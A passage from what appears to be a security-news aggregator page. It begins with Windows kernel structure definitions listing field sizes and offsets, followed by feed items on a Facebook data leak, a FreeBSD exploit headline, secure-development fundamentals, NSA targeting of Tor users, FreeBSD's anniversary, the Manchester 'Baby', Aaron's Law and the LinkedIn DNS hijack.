ULONG PeakMappedIoSpaceBytes; // Size=4 Offset=148
ULONG PagesForMdlBytes; // Size=4 Offset=152
ULONG PeakPagesForMdlBytes; // Size=4 Offset=156
ULONG ContiguousMemoryBytes; // Size=4 Offset=160
ULONG PeakContiguousMemoryBytes; // Size=4 Offset=164
};
struct _SYSTEM_ACPI_AUDIT_INFORMATION // Size=8
{
ULONG RsdpCount; // Size=4 Offset=0
struct
{
ULONG SameRsdt: 1; // Size=4 Offset=4 BitOffset=0 BitCount=1
ULONG SlicPresent: 1; // Size=4 Offset=4 BitOffset=1 BitCount=1
ULONG SlicDifferent: 1; // Size=4 Offset=4 BitOffset=2 BitCount=1
};
};
struct _SYSTEM_BASIC_PERFORMANCE_INFORMATION // Size=16
{
ULONG AvailablePages; // Size=4 Offset=0
ULONG CommittedPages; // Size=4 Offset=4
ULONG CommitLimit; // Size=4 Offset=8
ULONG PeakCommitment; // Size=4 Offset=12
};
typedef struct _QUERY_PERFORMANCE_COUNTER_FLAGS // Size=4
{
struct
{
ULONG KernelTransition: 1; // Size=4 Offset=0 BitOffset=0 BitCount=1
ULONG Reserved: 31; // Size=4 Offset=0 BitOffset=1 BitCount=31
};
ULONG ul; // Size=4 Offset=0
} QUERY_PERFORMANCE_COUNTER_FLAGS;
struct _SYSTEM_QUERY_PERFORMANCE_COUNTER_INFORMATION // Size=12
{
ULONG Version; // Size=4 Offset=0
QUERY_PERFORMANCE_COUNTER_FLAGS Flags; // Size=4 Offset=4
QUERY_PERFORMANCE_COUNTER_FLAGS ValidFlags; // Size=4 Offset=8
};
struct _SYSTEM_SESSION_BIGPOOL_INFORMATION // Size=24
{
ULONG NextEntryOffset; // Size=4 Offset=0
ULONG SessionId; // Size=4 Offset=4
ULONG Count; // Size=4 Offset=8
SYSTEM_BIGPOOL_ENTRY AllocatedInfo[1]; // Size=12 Offset=12
};
typedef enum _SYSTEM_PIXEL_FORMAT
{
SystemPixelFormatUnknown=0,
SystemPixelFormatR8G8B8=1,
SystemPixelFormatR8G8B8X8=2,
SystemPixelFormatB8G8R8=3,
SystemPixelFormatB8G8R8X8=4
} SYSTEM_PIXEL_FORMAT;
struct _SYSTEM_BOOT_GRAPHICS_INFORMATION // Size=32
{
LARGE_INTEGER FrameBuffer; // Size=8 Offset=0
ULONG Width; // Size=4 Offset=8
ULONG Height; // Size=4 Offset=12
ULONG PixelStride; // Size=4 Offset=16
ULONG Flags; // Size=4 Offset=20
SYSTEM_PIXEL_FORMAT Format; // Size=4 Offset=24
};
typedef struct _PEBS_DS_SAVE_AREA // Size=96
{
ULONGLONG BtsBufferBase; // Size=8 Offset=0
ULONGLONG BtsIndex; // Size=8 Offset=8
ULONGLONG BtsAbsoluteMaximum; // Size=8 Offset=16
ULONGLONG BtsInterruptThreshold; // Size=8 Offset=24
ULONGLONG PebsBufferBase; // Size=8 Offset=32
ULONGLONG PebsIndex; // Size=8 Offset=40
ULONGLONG PebsAbsoluteMaximum; // Size=8 Offset=48
ULONGLONG PebsInterruptThreshold; // Size=8 Offset=56
ULONGLONG PebsCounterReset0; // Size=8 Offset=64
ULONGLONG PebsCounterReset1; // Size=8 Offset=72
ULONGLONG PebsCounterReset2; // Size=8 Offset=80
ULONGLONG PebsCounterReset3; // Size=8 Offset=88
} PEBS_DS_SAVE_AREA;
typedef struct _PROCESSOR_PROFILE_CONTROL_AREA // Size=96
{
PEBS_DS_SAVE_AREA PebsDsSaveArea; // Size=96 Offset=0
} *PPROCESSOR_PROFILE_CONTROL_AREA;
struct _SYSTEM_PROCESSOR_PROFILE_CONTROL_AREA // Size=8
{
PPROCESSOR_PROFILE_CONTROL_AREA ProcessorProfileControlArea; // Size=4 Offset=0
UCHAR Allocate; // Size=1 Offset=4
};
struct _SYSTEM_ENTROPY_TIMING_INFORMATION // Size=12
{
PVOID EntropyRoutine; // Size=4 Offset=0 VOID (* EntropyRoutine)(PVOID,ULONG)
PVOID InitializationRoutine; // Size=4 Offset=4 VOID ( * InitializationRoutine)(PVOID,ULONG,PVOID)
PVOID InitializationContext; // Size=4 Offset=8
};
struct _SYSTEM_CONSOLE_INFORMATION // Size=4
{
ULONG DriverLoaded: 1; // Size=4 Offset=0 BitOffset=0 BitCount=1
ULONG Spare: 31; // Size=4 Offset=0 BitOffset=1 BitCount=31
};
struct _SYSTEM_PLATFORM_BINARY_INFORMATION // Size=24
{
ULONGLONG PhysicalAddress; // Size=8 Offset=0
PVOID HandoffBuffer; // Size=4 Offset=8
PVOID CommandLineBuffer; // Size=4 Offset=12
ULONG HandoffBufferSize; // Size=4 Offset=16
ULONG CommandLineBufferSize; // Size=4 Offset=20
};
struct _SYSTEM_DEVICE_DATA_INFORMATION // Size=28
{
UNICODE_STRING DeviceId; // Size=8 Offset=0
UNICODE_STRING DataName; // Size=8 Offset=8
ULONG DataType; // Size=4 Offset=16
ULONG DataBufferLength; // Size=4 Offset=20
PVOID DataBuffer; // Size=4 Offset=24
};
typedef struct _PHYSICAL_CHANNEL_RUN // Size=32
{
ULONG NodeNumber; // Size=4 Offset=0
ULONG ChannelNumber; // Size=4 Offset=4
ULONGLONG BasePage; // Size=8 Offset=8
ULONGLONG PageCount; // Size=8 Offset=16
ULONG Flags; // Size=4 Offset=24
} PHYSICAL_CHANNEL_RUN;
struct _SYSTEM_MEMORY_TOPOLOGY_INFORMATION // Size=48
{
ULONGLONG NumberOfRuns; // Size=8 Offset=0
ULONG NumberOfNodes; // Size=4 Offset=8
ULONG NumberOfChannels; // Size=4 Offset=12
PHYSICAL_CHANNEL_RUN Run[1]; // Size=32 Offset=16
};
struct _SYSTEM_MEMORY_CHANNEL_INFORMATION // Size=40
{
ULONG ChannelNumber; // Size=4 Offset=0
ULONG ChannelHeatIndex; // Size=4 Offset=4
ULONGLONG TotalPageCount; // Size=8 Offset=8
ULONGLONG ZeroPageCount; // Size=8 Offset=16
ULONGLONG FreePageCount; // Size=8 Offset=24
ULONGLONG StandbyPageCount; // Size=8 Offset=32
};
struct _SYSTEM_BOOT_LOGO_INFORMATION // Size=8
{
ULONG Flags; // Size=4 Offset=0
ULONG BitmapOffset; // Size=4 Offset=4
};
struct _SYSTEM_PROCESSOR_PERFORMANCE_INFORMATION_EX // Size=72
{
LARGE_INTEGER IdleTime; // Size=8 Offset=0
LARGE_INTEGER KernelTime; // Size=8 Offset=8
LARGE_INTEGER UserTime; // Size=8 Offset=16
LARGE_INTEGER DpcTime; // Size=8 Offset=24
LARGE_INTEGER InterruptTime; // Size=8 Offset=32
ULONG InterruptCount; // Size=4 Offset=40
ULONG Spare0; // Size=4 Offset=44
LARGE_INTEGER AvailableTime; // Size=8 Offset=48
LARGE_INTEGER Spare1; // Size=8 Offset=56
LARGE_INTEGER Spare2; // Size=8 Offset=64
};
struct _SYSTEM_SECUREBOOT_POLICY_INFORMATION // Size=24
{
GUID PolicyPublisher; // Size=16 Offset=0
ULONG PolicyVersion; // Size=4 Offset=16
ULONG PolicyOptions; // Size=4 Offset=20
};
struct _SYSTEM_SECUREBOOT_INFORMATION // Size=2
{
UCHAR SecureBootEnabled; // Size=1 Offset=0
UCHAR SecureBootCapable; // Size=1 Offset=1
};
struct _SYSTEM_PORTABLE_WORKSPACE_EFI_LAUNCHER_INFORMATION // Size=1
{
UCHAR EfiLauncherEnabled; // Size=1 Offset=0
};
Buherator likes this
22 Jun 17:11
Facebook Reports a Potential Leak of User Data, (Sat, Jun 22nd)
Facebook recently received a report that may have allowed some user information (email or phon ...(more)...
Buherator likes this
22 Jun 11:16
[local] - FreeBSD 9.0-9.1 mmap/ptrace Privilege Esclation Exploit
FreeBSD 9.0-9.1 mmap/ptrace Privilege Esclation Exploit
Buherator likes this
22 Jun 11:15
To Be a Secure Developer, Learn the Fundamentals
by Chris Eng
When I studied computer science in college, the curriculum wasn’t designed to teach all the different programming languages with the goal of becoming as “multi-lingual” as possible. Instead we focused on conceptual areas — data structures, machine structures, algorithms, etc. The languages with which you chose to illustrate those concepts were secondary to the concepts themselves. I believe most leading research universities emphasize concepts over mechanics in a similar fashion. However, some computer science departments focus on teaching particular languages rather than broad programming concepts. I always found this method of studying programming odd.
Language is simply syntax, and those trained in the concepts of programming should be able to pick any language up along the way. Think of it this way; if I asked a child to simply memorize multiplication tables through the 10s table then he or she would know 5×5=25. But would the child be able to figure out that 11×12 = 132? Probably not, because in the process of memorizing the answers to each equation, he or she didn’t learn the concept behind multiplication. If the student thought about it long enough, he or she may notice the pattern of how multiplication works, but why teach it that way? Isn’t it smarter to teach the concept so students can figure out the answer to any problem, not just have the responses for a set number of problems they were asked to memorize? In fact, this is exactly the rationale behind the Singapore Math approach, a teaching method that’s growing in popularity among US homeschooling families. Not surprisingly, Singapore is consistently ranked near the best in the world in mathematics achievement.
When I read the article, Lesson 1: How We Can All Be Great Developers in Forbes my first reaction was: this makes a lot of sense. Teaching the concepts of programming will help future programmers be more creative, more innovative, and more efficient, which will benefit their employers greatly. Now imagine if while learning these concepts they were also taught the principles of secure programming. They would internalize security concepts to the point where thinking “should I trust this input?” becomes as second nature as “how can I optimize this loop?” As with multiplication tables, memorizing which APIs to use in every programming language is not important.
Of course the other side of this coin means programmers may enter the workforce with less knowledge around coding style. Employers may need to be patient as new developers get up to speed on a certain language. However, if a developer understands the foundations of programming, he or she should be able to pick up the particulars of any language quickly. And while that may mean productivity isn’t as high at first, it also means that once the developer fully ramps up, he or she will ultimately be more productive and more secure in the long run.
Buherator likes this
22 Jun 11:15
Use Tor, Get Targeted By the NSA
by Soulskill
An anonymous reader sends this news from Ars Technica: "Using online anonymity services such as Tor or sending encrypted e-mail and instant messages are grounds for U.S.-based communications to be retained by the National Security Agency, even when they're collected inadvertently, according to a secret government document published Thursday. ...The memos outline procedures NSA analysts must follow to ensure they stay within the mandate of minimizing data collected on U.S. citizens and residents. While the documents make clear that data collection and interception must cease immediately once it's determined a target is within the U.S., they still provide analysts with a fair amount of leeway. And that leeway seems to work to the disadvantage of people who take steps to protect their Internet communications from prying eyes. For instance, a person whose physical location is unknown—which more often than not is the case when someone uses anonymity software from the Tor Project—"will not be treated as a United States person, unless such person can be positively identified as such, or the nature or circumstances of the person's communications give rise to a reasonable belief that such person is a United States person," the secret document stated.'" 
Read more of this story at Slashdot.
Luke.stirling, Buherator likes this
22 Jun 11:14
Happy 20th Birthday, FreeBSD
by timothy
mbadolato writes "FreeBSD celebrates its 20th birthday this week. On 19 June 1993, David Greenman, Jordan Hubbard and Rod Grimes announced the creation of their new fork of the BSD 4.3 operating system, and its new name: FreeBSD." And in the time since then, FreeBSD hasn't exactly stood still; it's spawned numerous other projects (like DragonFly BSD and PC-BSD), as well as served as the basis for much of Mac OS X; there's even a Raspberry Pi build. 
Read more of this story at Slashdot.
22 Jun 11:14
65 Years Ago, Manchester's 'Baby' Ran Electronically Stored Program
by timothy
hypnosec writes that the first ever practical implementation of the stored program concept took place 65 years ago, "as the Manchester Small Scale Experimental Machine aka 'Baby' became the world's first computer to run an electronically stored program on June 21, 1948. The 'Baby' was developed by Frederic C. Williams, Tom Kilburn and Geoff Tootill at the University of Manchester. 'Baby' served as a testbed for the experimental Williams-Kilburn tube – a cathode ray tube that was used to store binary digits, aka bits. The reason this became a milestone in computing history was that up until 'Baby' ran the first electronically stored program, there was no means of storing and accessing this information in a cost-effective and flexible way." 
Read more of this story at Slashdot.
21 Jun 12:33
DNS provider's error caused LinkedIn "hack" and affected 5,000 more
In all, around 5,000 sites, including LinkedIn, were affected by a configuration error at DNS provider Network Solutions; this sent traffic to an IP range run by a network services company
|
|
21 Jun 08:47
Aaron's Law Would Revamp Computer Fraud Penalties
by timothy
An anonymous reader writes "Two U.S. lawmakers have introduced a bill that would prevent the Department of Justice from prosecuting people for violating terms of service for Web-based products, website notices or employment agreements under the Computer Fraud and Abuse Act (CFAA). On Thursday, Representative Zoe Lofgren, a California Democrat, and Senator Ron Wyden, an Oregon Democrat, introduced Aaron's Law, a bill aimed at removing some types of prosecutions under the CFAA." The bill is of course named for Aaron Swartz. 
Read more of this story at Slashdot.
Buherator likes this
20 Jun 14:17
Linkedin DNS Hijack - Update, (Thu, Jun 20th)
Update
It looks like this issue stemmed from a DDoS mitigation ...(more)...